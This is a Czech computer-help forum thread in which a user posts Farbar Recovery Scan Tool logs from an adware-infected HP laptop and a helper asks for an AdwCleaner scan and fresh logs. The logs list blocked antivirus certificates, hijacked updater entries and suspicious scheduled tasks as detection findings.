2019-07-26 22:56 - 2017-05-14 21:10 - 000000000 ____D C:\Users\Radim\AppData\Roaming\gplyra
2019-07-26 22:19 - 2017-05-16 13:06 - 000000000 ____D C:\Terward
2019-07-26 22:04 - 2017-05-18 13:06 - 000000000 ____D C:\Reimward
2019-07-26 22:02 - 2014-10-30 20:48 - 000000000 ____D C:\ProgramData\421e43cc-ed79-4e60-91b6-5efd8c307dd0
2019-07-26 19:46 - 2017-05-14 21:06 - 000000000 ____D C:\Program Files (x86)\Cooferlydrefeght
2019-07-24 13:39 - 2017-05-14 21:06 - 000000000 ____D C:\Program Files (x86)\Wotustupocult Controls
2019-07-24 13:39 - 2014-11-26 21:20 - 000000000 ____D C:\ProgramData\fnnegffbdniflckhmjifljomfnnjhhgd
2019-07-24 13:00 - 2013-08-22 15:36 - 000000000 ____D C:\Program Files\Magic Fortune XML Converter
2019-07-24 12:09 - 2017-05-16 13:05 - 000005085 _____ C:\Users\Public\Documents\temp.dat
2019-07-24 11:49 - 2017-05-24 10:11 - 000000000 ____D C:\Users\Radim\AppData\Local\snare
2019-07-24 11:49 - 2017-05-18 13:07 - 000000000 ____D C:\Users\Radim\AppData\Local\CSHMDR
2019-07-24 11:49 - 2017-05-16 01:07 - 000000000 ____D C:\Users\Radim\AppData\Roaming\WinSAPSvc
2019-07-24 11:49 - 2017-05-16 01:07 - 000000000 ____D C:\Users\Radim\AppData\Local\CWASRE
2019-07-19 17:36 - 2013-08-22 17:36 - 000000000 ___HD C:\Program Files\WindowsApps
2019-07-09 10:28 - 2013-08-22 17:36 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed
2019-07-09 10:28 - 2013-08-22 17:36 - 000000000 ____D C:\WINDOWS\system32\Macromed
2019-07-09 10:00 - 2019-06-12 16:54 - 000000000 ____D C:\Users\Radim\Desktop\World of Warcraft Cataclysm 4.3.4
2019-07-09 09:52 - 2019-05-22 20:10 - 000000000 ____D C:\Users\Radim\Downloads\NovĂˇ sloĹľka
2019-07-04 10:07 - 2014-05-03 11:09 - 000000000 ____D C:\Users\Radim\AppData\Roaming\Skype

==================== Files in the root of some directories ================

2017-12-14 20:34 - 2018-03-20 22:22 - 000020800 _____ () C:\Users\Radim\AppData\Roaming\downloads.json
2014-11-09 20:43 - 2014-11-09 21:23 - 000000827 _____ () C:\Users\Radim\AppData\Roaming\LiveSupport.exe_log.txt
2014-11-09 20:43 - 2014-11-09 21:23 - 000000096 _____ () C:\Users\Radim\AppData\Roaming\regsvr32.exe_log.txt
2016-11-20 15:47 - 2016-11-20 17:19 - 000005120 _____ () C:\Users\Radim\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2019-02-01 02:25 - 2019-04-16 11:00 - 000007597 _____ () C:\Users\Radim\AppData\Local\Resmon.ResmonCfg

==================== SigCheck ===============================

(There is no automatic fix for files that do not pass verification.)

LastRegBack: 2016-05-17 06:49
==================== End of FRST.txt ============================

#3 Příspěvek od **Rudy** » 30 črc 2019 13:06

Zdravím!
Spusťte tuto utilitu:

Ulozte na plochu AdwCleaner https://malwarebytes.com/adwcleaner/ nebo http://www.bleepingcomputer.com/download/adwcleaner/

ukoncete vsechny programy
odsouhlaste licencni podmiky (EULA) klikem na Souhlasim
kliknete pravym na ikonu AdwCleaneru a vyberte Spustit jako spravce (v pripade Win XP spustte obycejne dvojklikem)
kliknete na Skenovat nyni (Scan now), pote na Cisteni a opravy (Clean and Repair)
po restartu na Vas vyskoci log (pripadne jej najdete v C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt), jehoz obsah zkopirujte do pristi odpovedi

kovadlina11 · #4 Příspěvek od **kovadlina11** » 31 črc 2019 00:21

log se sem nevejde proto davam jako prilohu v zipu dekuji moc za pomoct

#5 Příspěvek od **Rudy** » 31 črc 2019 09:10

OK. Dejte nové logy FRST+Addition.

kovadlina11 · #6 Příspěvek od **kovadlina11** » 31 črc 2019 09:50

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 30-07-2019 01
Ran by Radim (administrator) on RADIM-NTB (Hewlett-Packard HP ProBook 4540s) (31-07-2019 10:41:44)
Running from C:\Users\Radim\Desktop
Loaded Profiles: Radim (Available Profiles: Spravce & Radim)
Platform: Windows 8.1 (Update) (X64) Language: ÄŚeĹˇtina (ÄŚeskĂˇ republika)
Default browser: FF
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

() [File not signed] C:\WINDOWS\runservice.exe
(Apple Inc. -> Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\aswidsagent.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(BitTorrent Inc.) [File not signed] C:\Users\Radim\AppData\Roaming\uTorrent\uTorrent.exe
(Electronic Arts, Inc. -> Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe
(Hewlett-Packard Company -> Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Hewlett-Packard Company -> Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP 3D DriveGuard\accelerometerST.exe
(Hewlett-Packard Company -> Hewlett-Packard Company) C:\WINDOWS\System32\hpservice.exe
(IDT, Inc.) [File not signed] C:\Program Files\IDT\WDM\stacsv64.exe
(Intel Corporation - IntelÂ® Management Engine Firmware -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(Intel Corporation - IntelÂ® Management Engine Firmware -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation - IntelÂ® Management Engine Firmware -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Intel Corporation - IntelÂ® Management Engine Firmware -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Intel Corporation - IntelÂ® Rapid Storage Technology -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation - IntelÂ® Rapid Storage Technology -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\WINDOWS\System32\igfxCUIService.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\WINDOWS\System32\igfxEM.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\WINDOWS\System32\igfxHK.exe
(Intel(R) Corporation) [File not signed] C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Microsoft Corporation -> Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Windows -> Microsoft Corporation) C:\WINDOWS\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\WINDOWS\System32\dllhost.exe
(Microsoft Windows Hardware Compatibility Publisher -> AMD) C:\WINDOWS\System32\atieclxx.exe
(Microsoft Windows Hardware Compatibility Publisher -> AMD) C:\WINDOWS\System32\atiesrxx.exe
(Microsoft Windows Hardware Compatibility Publisher -> Pixart Imaging Inc) C:\WINDOWS\System32\TiltWheelMouse.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Piriform Software Ltd -> Piriform Software Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(TeamViewer -> TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [MouseDriver] => C:\WINDOWS\system32\TiltWheelMouse.exe [241152 2013-04-09] (Microsoft Windows Hardware Compatibility Publisher -> Pixart Imaging Inc)
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [269192 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [285832 2014-04-29] (Intel Corporation - IntelÂ® Rapid Storage Technology -> Intel Corporation)
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== ATTENTION
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== ATTENTION
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ATTENTION
HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ATTENTION
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ATTENTION
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ATTENTION
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ATTENTION
HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== ATTENTION
HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== ATTENTION
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ATTENTION
HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ATTENTION
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ATTENTION
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ATTENTION
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\Run: [Windows] => C:\Users\Public\Public Documents\Windows Movie Player\player.exe [675840 2008-12-07] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4289728 2016-04-04] (Disc Soft Ltd -> Disc Soft Ltd)
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\Run: [AccelerometerSysTrayApplet] => C:\Program Files\Hewlett-Packard\HP 3D DriveGuard\AccelerometerSt.Exe [74144 2012-08-23] (Hewlett-Packard Company -> Hewlett-Packard Company)
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [23153344 2019-07-11] (Piriform Software Ltd -> Piriform Software Ltd)
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\Run: [Discord] => C:\Users\Radim\AppData\Local\Discord\app-0.0.305\Discord.exe [81780056 2019-03-07] (Discord Inc. -> Discord Inc.)
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\MountPoints2: {504f5f88-f0b9-11e4-bf35-b4b52f8204d5} - "F:\HTC_Sync_Manager_PC.exe"
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\MountPoints2: {c6bcc6da-e434-11e3-be7e-a4173142e534} - "E:\HTC_Sync_Manager_PC.exe"
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\MountPoints2: {e1c8640c-1171-11e4-beab-a4173142e534} - "E:\HTC_Sync_Manager_PC.exe"
HKU\S-1-5-18\...\Run: [AviraSpeedup] => "C:\Program Files (x86)\Avira\AviraSpeedup\avira_system_speedup.exe" -autorun
HKLM\...\Drivers32: [msacm.vorbis] => C:\Windows\SysWOW64\vorbis.acm [1554944 2009-09-15] (HMS hxxp://hp.vector.co.jp/authors/VA012897/) [File not signed]
HKLM\...\Drivers32: [vidc.VP60] => C:\Windows\SysWOW64\vp6vfw.dll [438272 2005-06-24] (EA.com/On2.com) [File not signed]
HKLM\...\Drivers32: [vidc.VP61] => C:\Windows\SysWOW64\vp6vfw.dll [438272 2005-06-24] (EA.com/On2.com) [File not signed]
HKLM\...\Drivers32: [vidc.VP62] => C:\Windows\SysWOW64\vp6vfw.dll [438272 2005-06-24] (EA.com/On2.com) [File not signed]
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
Startup: C:\Users\Radim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Facebook Gameroom.lnk [2019-06-12]
ShortcutTarget: Facebook Gameroom.lnk -> C:\Users\Radim\AppData\Local\Facebook\Games\FacebookGameroom.exe (Facebook, Inc. -> Facebook)
GroupPolicy: Restriction - Chrome <==== ATTENTION
GroupPolicy-x32: Restriction - Chrome <==== ATTENTION
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {083A6183-4AEF-40C6-8424-1484BF42890F} - System32\Tasks\Microsoft\Windows\SideShow\GadgetManager => {FF87090D-4A9A-4F47-879B-29A80C355D61}
Task: {0ACEF334-ADE2-40A5-A4A0-106E681C1553} - System32\Tasks\Opera scheduled Autoupdate 1555619304 => C:\Users\Radim\AppData\Local\Programs\Opera\launcher.exe [1519640 2019-07-24] (Opera Software AS -> Opera Software)
Task: {0D8A891D-890C-4808-84D8-2F436AB14653} - \Microsoft\Windows\Application Experience\AitAgent -> No File <==== ATTENTION
Task: {0F689541-D312-4E73-B45C-8D692030573B} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [619416 2019-07-11] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {119E7BA2-556A-489D-8CFF-C5C3CCC18174} - System32\Tasks\Microsoft\Windows\MobilePC\HotStart => {06DA0625-9701-43DA-BFD7-FBEEA2180A1E}
Task: {1274336E-AB06-46B6-A48C-0671C5557CC6} - \Microsoft\Windows\TaskScheduler\Maintenance Configurator -> No File <==== ATTENTION
Task: {129C9A6F-006B-41B0-944A-0579ACA034CB} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2019-07-09] (Adobe Inc. -> Adobe)
Task: {1687544D-7247-4F5A-965A-A6E920E55278} - \Microsoft\Windows\TaskScheduler\Manual Maintenance -> No File <==== ATTENTION
Task: {1BFF6763-5417-42C6-A8B9-23DE8C0E01B0} - System32\Tasks\a7982934-0630-49b5-bdb1-d23d83f53ffd-6 => C:\Program Files (x86)\Torntv V9.0\Torntv V9.0-nova.exe <==== ATTENTION
Task: {1CB785F4-4249-4045-A786-199062EBFDDC} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [524192 2012-08-15] (Hewlett-Packard Company -> Hewlett-Packard Company)
Task: {1DC08E2F-0C21-477E-AE3F-DD9C0239DBE8} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [561984 2011-06-01] (Apple Inc. -> Apple Inc.)
Task: {2A9B669F-6742-4A25-8802-D4A53367033E} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => Command(1): %windir%\system32\GWX\GWXConfigManager.exe -> /RefreshConfig
Task: {2A9B669F-6742-4A25-8802-D4A53367033E} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => Command(2): %windir%\system32\GWX\GWXConfigManager.exe -> /RefreshContent
Task: {2A9B669F-6742-4A25-8802-D4A53367033E} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => Command(3): C:\WINDOWS\system32\GWX\GWXDetector.exe [ [ ]]
Task: {40525C58-79C2-47A1-9AA2-F1D7FC4F0691} - \Microsoft\Windows\WindowsBackup\ConfigNotification -> No File <==== ATTENTION
Task: {411D1741-40BE-4B13-B990-5DA2DD0B71DB} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe [2047368 2019-07-31] (AVAST Software s.r.o. -> AVAST Software)
Task: {41EB1A5B-C29A-47AC-B28A-654DD9754588} - System32\Tasks\Microsoft\Windows\SideShow\SystemDataProviders => {7CCA6768-8373-4D28-8876-83E8B4E3A969}
Task: {51C8E8CF-5601-4895-BA14-1F91249AF735} - System32\Tasks\BrickEnforcer-S-1910914952 => c:\programdata\trusted publisher\premiumaugmenter\BrickEnforcer.exe <==== ATTENTION
Task: {561B96D9-0C13-46D1-B48C-11B450EDE068} - System32\Tasks\{05CD7012-09EF-4D71-BB5D-4054E9B7C3DC} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\Call of Duty\CoDSP.exe" -d "C:\Program Files (x86)\Call of Duty"
Task: {5A503EF4-4BCD-4DD8-B3EA-3056619CA94E} - System32\Tasks\Wotustupocult Controls => C:\Program Files (x86)\Cooferlydrefeght\wikege.exe [678864 2017-05-14] (Google Inc -> Google Inc.)
Task: {5BAA57CE-4F3B-4FAE-BB82-287C65A24857} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => Command(1): %windir%\system32\GWX\GWXUXWorker.exe -> /ScheduleUpgradeReminderTime
Task: {5BAA57CE-4F3B-4FAE-BB82-287C65A24857} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => Command(2): C:\WINDOWS\system32\GWX\GWXDetector.exe [ [ ]]
Task: {6E67E351-AF06-45F0-ABF6-9326694DB9C3} - System32\Tasks\HPCeeScheduleForRadim => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [91704 2010-09-13] (Hewlett-Packard Company -> Hewlett-Packard)
Task: {6F02587F-8A2B-4552-97F6-DEEF229E335B} - \Microsoft\Windows\TaskScheduler\Idle Maintenance -> No File <==== ATTENTION
Task: {7BB75058-32A7-4550-9E35-ADB4BC2794DE} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [16835256 2019-07-11] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {7D564906-D4AB-486A-A7CE-35245B2DBC50} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [524192 2012-08-15] (Hewlett-Packard Company -> Hewlett-Packard Company)
Task: {7E3BD6D3-90C4-4768-B8A8-7AB6AC090F1F} - System32\Tasks\{D20BA10B-ED49-4FFF-8443-5FFA687CC72A} => C:\WINDOWS\system32\pcalua.exe -a D:\Autorun.exe -d D:\
Task: {83EB24E0-F46D-4BD4-BBB0-3FB63AA811EA} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime => C:\WINDOWS\system32\GWX\GWXUXWorker.exe
Task: {87D6BD84-A209-4EE6-A6AD-3F9E410A5AFA} - System32\Tasks\{A1783EA8-E469-4557-B18F-2087FFAF942E} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\Ubisoft\Gearbox Software\BrothersInArms\System\bia.exe" -d "C:\Program Files (x86)\Ubisoft\Gearbox Software\BrothersInArms\System"
Task: {8A4376A7-45C5-4758-8B4D-D11B4F80822D} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2833504 2017-08-26] (Synaptics Incorporated -> Synaptics Incorporated)
Task: {8F5EA013-4275-4072-A66E-5D725B35544A} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe [208760 2018-06-27] (HP Inc. -> HP Inc.)
Task: {974067EA-FC62-4E5D-8A34-2E6EC95FDAD5} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPSFReport.exe [88120 2016-02-18] (Hewlett-Packard Company -> Hewlett-Packard)
Task: {9EE2B51A-B4F7-4022-AEA1-E6AAA116B78A} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [3940232 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
Task: {A07A2C70-CA2E-45FA-B59D-9FF72C697A86} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_223_Plugin.exe [1457208 2019-07-09] (Adobe Inc. -> Adobe)
Task: {B485B28A-1871-4460-83D8-46B833C6442D} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_223_pepper.exe [1453112 2019-07-09] (Adobe Inc. -> Adobe)
Task: {B7992938-01F1-4F40-A0EC-0D23D2F0F152} - \Microsoft\Windows\TaskScheduler\Regular Maintenance -> No File <==== ATTENTION
Task: {BA2D6EF1-2E43-41F4-8F05-06D5FD4FE079} - System32\Tasks\{48E5C962-97D2-4C1B-8B42-380F8CFBD54D} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\Activision\Spider-Man 2\System\Webhead[old].exe" -d "C:\Program Files (x86)\Activision\Spider-Man 2\System"
Task: {C3753944-E90D-499B-9533-7FC6F108AC80} - System32\Tasks\{C9E0EEC1-BDC8-45D5-8B41-CCC7817DD33A} => C:\WINDOWS\system32\pcalua.exe -a I:\Launch.exe -d I:\
Task: {CBC69E20-37C7-4C3F-BF31-C6CA3F6CA801} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Tuneup => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [524192 2012-08-15] (Hewlett-Packard Company -> Hewlett-Packard Company)
Task: {CFD7C21A-808B-487B-A6EC-8A10E44E8360} - \Microsoft\Windows\SettingSync\BackupTask -> No File <==== ATTENTION
Task: {D7F8C857-94B7-4D20-99D2-CC6C992D4C27} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Critical Actions Pending => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [524192 2012-08-15] (Hewlett-Packard Company -> Hewlett-Packard Company)
Task: {D9335A1C-9788-4545-9A3A-118112B149C5} - System32\Tasks\Microsoft\Windows\SideShow\SessionAgent => {45F26E9E-6199-477F-85DA-AF1EDFE067B1}
Task: {E396BF4A-BF40-49B0-8663-6E5A5677A19A} - System32\Tasks\Microsoft\Windows\SideShow\AutoWake => {E51DFD48-AA36-4B45-BB52-E831F02E8316}
Task: {EC594B90-2D56-4C16-A5E2-F562DBA81135} - System32\Tasks\{13B27974-850F-429D-8474-B89E6AB4248F} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\Call of Duty\CoDSP.exe" -d "C:\PROGRA~2\Call of Duty"
Task: {F3AEAD49-EE01-48DF-A58C-3BFF42AB5121} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [651400 2017-09-20] (Hewlett Packard -> HP Inc.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\a7982934-0630-49b5-bdb1-d23d83f53ffd-6.job => C:\Program Files (x86)\Torntv V9.0\Torntv V9.0-nova.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\BrickEnforcer-S-1910914952.job => c:\programdata\trusted publisher\premiumaugmenter\BrickEnforcer.exeV/schedule /profile c:\programdata\trusted publisher\premiumaugmenter\1910914952.ini <==== ATTENTION
Task: C:\WINDOWS\Tasks\HPCeeScheduleForRadim.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 10.255.255.10 10.255.255.20 8.8.8.8 192.168.1.1
Tcpip\..\Interfaces\{86DF9DE8-986D-4D13-8238-E68CBFD36301}: [DhcpNameServer] 10.255.255.10 10.255.255.20 8.8.8.8 192.168.1.1
